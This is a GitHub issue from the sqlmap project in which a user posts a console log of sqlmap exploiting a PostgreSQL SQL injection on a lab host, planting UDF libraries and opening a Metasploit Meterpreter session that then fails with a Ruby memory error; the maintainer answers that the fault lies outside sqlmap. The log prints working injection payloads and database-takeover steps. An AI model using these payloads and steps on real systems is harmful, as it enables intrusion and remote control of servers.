search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
31.86k stars 5.66k forks source link

sqlmap meterpreter error #2182

Closed ljesparis closed 7 years ago

ljesparis commented 7 years ago

i got this meterpreter error, with 32 bit machine.

root@leoxnidas:/path/to/sqlmap# ./sqlmap.py -u "http://192.168.2.4/pgsql/get_brackets.php?id=1"
         _
 ___ ___| |_____ ___ ___  {1.0.9.32#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:00:18

when sqlmap detect sqlinjection will alert you with a beep sound, do you want to enable it? [Y/n] n
do you want to configure your requests? [y/N] 
do you want to increment tests level? [y/N] 
do you want to want to choose what data to retrive from dbms? [y/N] 
do you want to write a file to a victim machine? [y/N] 
do you want to read a victim file? [y/N] 
do you want to execute an victim operating system command? [y/N] 
do you want to execute a remote victim machine shell? [y/N] 
by default tor network will be used, would you like to desable it? [y/N] y
do you want to try bypass backend WAF/IPS/IDS if exists? [Y/n] n
Would you like to use metasploit? [Y/n] 
[12:00:25] [INFO] These options can be used to access the back-end database management system underlying operating system
[12:00:25] [WARNING] Metasploit was not found at /usr/share/metasploit-framework
Set metasploit correct location [/usr/share/metasploit-framework] /opt/metasploit/app
which explotation technique you want to use? [1]
[1] os-pwn
[2] os-smbrelay
[3] os-bof
> 1
do you want to perform a database process' user privilege escalation? [Y/n] 
[12:00:32] [INFO] fetched random HTTP User-Agent header from file '/home/leoxnidas/Escritorio/sqlmap_enviroment/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7'
[12:00:33] [INFO] resuming back-end DBMS 'postgresql' 
[12:00:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

---
Parameter: id (GET)
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: id=1);SELECT PG_SLEEP(5)--

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1) UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(98)||CHR(107)||CHR(113)||CHR(113))||(CHR(73)||CHR(83)||CHR(118)||CHR(120)||CHR(79)||CHR(120)||CHR(98)||CHR(72)||CHR(70)||CHR(116)||CHR(98)||CHR(84)||CHR(105)||CHR(79)||CHR(101)||CHR(78)||CHR(101)||CHR(66)||CHR(118)||CHR(80)||CHR(102)||CHR(111)||CHR(114)||CHR(99)||CHR(101)||CHR(89)||CHR(75)||CHR(82)||CHR(116)||CHR(98)||CHR(81)||CHR(101)||CHR(88)||CHR(66)||CHR(78)||CHR(103)||CHR(80)||CHR(120)||CHR(119)||CHR(79))||(CHR(113)||CHR(118)||CHR(113)||CHR(106)||CHR(113))-- JUrc

---
[12:00:33] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: PostgreSQL
[12:00:33] [INFO] fingerprinting the back-end DBMS operating system
[12:00:33] [INFO] the back-end DBMS operating system is Linux
[12:00:33] [INFO] testing if current user is DBA
[12:00:33] [INFO] detecting back-end DBMS version from its banner
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 1
[12:00:34] [INFO] checking if UDF 'sys_bineval' already exist
[12:00:34] [INFO] checking if UDF 'sys_exec' already exist
[12:00:34] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)                  
[12:00:34] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions 
[12:00:35] [INFO] the local file '/tmp/sqlmapr45oLF20957/lib_postgresqludf_sysfvl5Zw.so' and the remote file '/tmp/libslhid.so' have the same size (5100 B)
[12:00:35] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[12:00:35] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Via shellcodeexec (file system way, preferred on 64-bit systems)
> 1
[12:00:37] [INFO] creating Metasploit Framework multi-stage shellcode 
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Bind TCP: Listen on the database host for a connection
2
what is the back-end DBMS address? [Enter for '192.168.2.4' (detected)] 
which remote port number do you want to use? [21214] 
which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)
> 2
[12:00:43] [INFO] creation in progress ................... done
[12:01:02] [INFO] running Metasploit Framework command line interface locally, please wait..
[12:01:02] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+

       =[ metasploit v4.12.25-dev                         ]
+ -- --=[ 1577 exploits - 901 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

PAYLOAD => linux/x86/meterpreter/bind_tcp
EXITFUNC => thread
LPORT => 21214
RHOST => 192.168.2.4
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Starting the payload handler...
[*] Sending stage (1495599 bytes) to 192.168.2.4
[*] Meterpreter session 1 opened (192.168.2.10:42424 -> 192.168.2.4:21214) at 2016-09-24 12:02:33 -0400

[-] Session manipulation failed: Cannot allocate memory - infocmp ["/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/core_ext/kernel/agnostics.rb:7:in ``'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/core_ext/kernel/agnostics.rb:7:in ``'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:1815:in `get_term_capabilities'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:2027:in `_rl_init_terminal_io'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:2519:in `readline_initialize_everything'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:3804:in `rl_initialize'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:4823:in `readline'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/input/readline.rb:132:in `readline_with_output'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/input/readline.rb:86:in `pgets'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/shell.rb:187:in `run'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/base/sessions/meterpreter.rb:473:in `_interact'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/interactive.rb:49:in `interact'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/command_dispatcher/core.rb:1968:in `cmd_sessions'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:428:in `run_command'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:390:in `block in run_single'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:384:in `each'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:384:in `run_single'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/command_dispatcher/exploit.rb:140:in `cmd_exploit'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:428:in `run_command'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:390:in `block in run_single'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:384:in `each'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:384:in `run_single'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/driver.rb:233:in `block in initialize'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/driver.rb:232:in `each'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/driver.rb:232:in `initialize'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/metasploit/framework/command/console.rb:62:in `new'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/metasploit/framework/command/console.rb:62:in `driver'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/metasploit/framework/command/console.rb:48:in `start'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/metasploit/framework/command/base.rb:82:in `start'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/msfconsole:48:in `<top (required)>'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfconsole:23:in `load'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfconsole:23:in `<main>'"]
[12:02:45] [INFO] cleaning up the database management system

do you want to remove UDF 'sys_exec'? [Y/n] 
[12:02:56] [INFO] database management system cleanup finished
[12:02:56] [WARNING] remember that UDF shared object files and Metasploit related files in the temporary folder saved on the file system can only be deleted manually
[12:02:56] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.2.4'

[*] shutting down at 12:02:56
stamparm commented 7 years ago

Please, lets stay with #2173. Also, this doesn't look like sqlmap's issue:

[-] Session manipulation failed: Cannot allocate memory - infocmp ["/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/core_ext/kernel/agnostics.rb:7:in ``'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/core_ext/kernel/agnostics.rb:7:in ``'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:1815:in `get_term_capabilities'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:2027:in `_rl_init_terminal_io'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:2519:in `readline_initialize_everything'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:3804:in `rl_initialize'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:4823:in `readline'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/input/readline.rb:132:in `readline_with_output'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/input/readline.rb:86:in `pgets'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/shell.rb:187:in `run'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/base/sessions/meterpreter.rb:473:in `_interact'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/interactive.rb:49:in `interact'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/command_dispatcher/core.rb:1968:in `cmd_sessions'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:428:in `run_command'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:390:in `block in run_single'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:384:in `each'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:384:in `run_single'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/command_dispatcher/exploit.rb:140:in `cmd_exploit'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:428:in `run_command'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:390:in `block in run_single'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:384:in `each'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:384:in `run_single'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/driver.rb:233:in `block in initialize'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/driver.rb:232:in `each'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/driver.rb:232:in `initialize'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/metasploit/framework/command/console.rb:62:in `new'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/metasploit/framework/command/console.rb:62:in `driver'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/metasploit/framework/command/console.rb:48:in `start'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/metasploit/framework/command/base.rb:82:in `start'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/msfconsole:48:in `<top (required)>'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfconsole:23:in `load'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfconsole:23:in `<main>'"]